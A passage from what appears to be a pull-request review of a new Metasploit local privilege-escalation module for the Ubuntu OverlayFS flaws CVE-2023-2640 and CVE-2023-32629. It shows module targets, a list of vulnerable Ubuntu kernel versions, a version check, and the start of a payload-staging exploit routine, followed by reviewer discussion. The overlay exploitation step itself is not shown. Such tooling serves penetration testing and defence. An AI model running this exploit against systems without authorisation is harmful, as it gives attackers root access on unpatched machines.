modules/exploits/linux/local/gameoverlay_privesc.rb

```diff
@@ -0,0 +1,180 @@
+          ['URL', 'https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability'],
+          ['CVE', '2023-32629'],
+          ['CVE', '2023-2640']
+        ],
+        'Targets' => [
+          [
+            'Linux_Binary',
+            {
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'PrependSetuid' => true
+            }
+          ],
+          [
+            'Linux_Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Payload' =>
+                {
+                  'BadChars' => "\x93\x94"
+                }
+            }
+          ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options [
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']),
+      OptString.new('PayloadFileName', [true, 'Name of payload', 'marv']),
+    ]
+  end
+
+  def vuln
+    # Keys are ubuntu versions, vals is list of vunerable kernels
+    {
+      "Lunar Lobster": %w[6.2.0], # Ubuntu 23.04
+      "Kinetic Kudu": %w[5.19.0], # Ubuntu 22.10
+      "Jammy Jellyfish": %w[5.19.0 6.2.0], # Ubuntu 22.04 LTS
+      "Focal Fossa": %w[5.4.0], # Ubuntu 20.04 LTS
+      "Bionic Beaver": %w[5.4.0] # Ubuntu 18.04 LTS
+    }.transform_keys!(&:to_s) # w/o this key will be :"Bionic Beaver"
+  end
+
+  def check
+    return CheckCode::Safe('Target is not linux.') unless session.platform == 'linux'
+
+    # Must be Ubuntu
+    return CheckCode::Safe('Target is not Ubuntu.') unless kernel_version =~ /[uU]buntu/
+
+    os = cmd_exec 'cat /etc/os-release'
+
+    # grab codename i.e. Focal Fossa
+    codename = os.scan(/\(\w* \w*\)/)[0]
+
+    # Remove '(' and ')'
+    codename.delete_prefix!('(').delete_suffix!(')')
+
+    print_status "Detected Ubuntu version: #{codename}"
+
+    # uname -r
+    # yields something like 5.4.0-1018-blah
+    kernel = kernel_release
+    print_status "Detected kernel version: #{kernel}"
+
+    # Make sure release is running vunerable kernel
+    # will this return in correct context??
+    # could scan kernel to prevent looping if return below doesn't work
+    vuln[codename].each do |version|
+      if kernel.include? version
+        return CheckCode::Vulnerable "#{codename} with #{kernel} kernel is vunerable"
+      end
+    end
+
+    return CheckCode::Safe('Target does not appear to be running a vunerable Ubuntu Distro or Kernel')
+  end
+
+  def exploit
+    datastore['PayloadFilename']
+    pay_dir = datastore['WritableDir']
+    pay_dir += '/' unless pay_dir.ends_with? '/'
+    pay_dir += Rex::Text.rand_text_alpha 10
+    pay_dir += '/' unless pay_dir.ends_with? '/'
+    print_status "Creating directory to store payload: #{pay_dir}"
+    mkdir pay_dir
+    pay_dir = datastore['WritableDir']
+    pay_dir << '/' unless pay_dir.ends_with? '/'
```

Comment:
Check out the Rex join for path

Reply:
I've used `Rex::File.join` for creating the full paths of the merged directories. I've also randomized the `bash` copy with `Rex::Text.rand_text_alpha(rand(6..13))` but haven't tested it. If random alpha numeric characters don't work maybe we could set it as an option like `BashCopy'.